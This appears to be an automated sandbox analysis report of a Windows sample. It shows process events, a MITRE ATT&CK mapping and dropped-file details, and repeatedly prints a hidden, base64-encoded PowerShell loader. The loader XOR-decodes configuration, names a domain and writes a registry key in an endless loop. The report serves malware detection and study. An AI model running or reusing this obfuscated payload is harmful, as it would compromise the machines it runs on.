ZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts111
Command and Scripting Interpreter		Path Interception1
Access Token Manipulation		21
Virtualization/Sandbox Evasion		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts2
PowerShell		Boot or Logon Initialization Scripts11
Process Injection		1
Access Token Manipulation		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information		NTDS2
File and Directory Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:35.0.0 Citrine
Analysis ID:651250
Start date and time: 23/06/202217:40:552022-06-23 17:40:55 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 32s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultwindowscmdlinecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal52.evad.win@5/2@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI

Warnings

  • Exclude process from analysis (whitelisted): conhost.exe, svchost.exe
  • Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

TimeTypeDescription
17:42:11API Interceptor5x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TVQUNHR0LNB9QC6OSD3M.temp

Download File
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.5809258572265112
Encrypted:false
SSDEEP:96:chQCyhMqbqvsqvJCwoBz8hQCyhMqbqvsEHyqvJCwor/zhkKr+HyklX0lUVLVn:cGGoBz8GeHnor/zhFPklXLVn
MD5:5A8A6BA31F781C9190DAC02A6B2D2F2F
SHA1:62614A67C47E9335DF47D1940EEDF4575799BA10
SHA-256:EB7AB35986BABF60EB66CF9CF66D0B93FB92C370B5EB291733EDA8DAC6AD0A53
SHA-512:34A83CC1A9A34CCADFA0C488EC3FA775D60286BB7C3EDC3C47EF4C8F0156355AA2712ECCB9D20D2CE41DBF98E8C1837D6DEF210BE13B316543574657E7BBC208
Malicious:false
Reputation:low
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.5809258572265112
Encrypted:false
SSDEEP:96:chQCyhMqbqvsqvJCwoBz8hQCyhMqbqvsEHyqvJCwor/zhkKr+HyklX0lUVLVn:cGGoBz8GeHnor/zhFPklXLVn
MD5:5A8A6BA31F781C9190DAC02A6B2D2F2F
SHA1:62614A67C47E9335DF47D1940EEDF4575799BA10
SHA-256:EB7AB35986BABF60EB66CF9CF66D0B93FB92C370B5EB291733EDA8DAC6AD0A53
SHA-512:34A83CC1A9A34CCADFA0C488EC3FA775D60286BB7C3EDC3C47EF4C8F0156355AA2712ECCB9D20D2CE41DBF98E8C1837D6DEF210BE13B316543574657E7BBC208
Malicious:false
Reputation:low
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

Static File Info

No static file info

Network Behavior

No network behavior found

Statistics

Behavior

Click to jump to process

System Behavior

General

Target ID:0
Start time:17:42:08
Start date:23/06/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB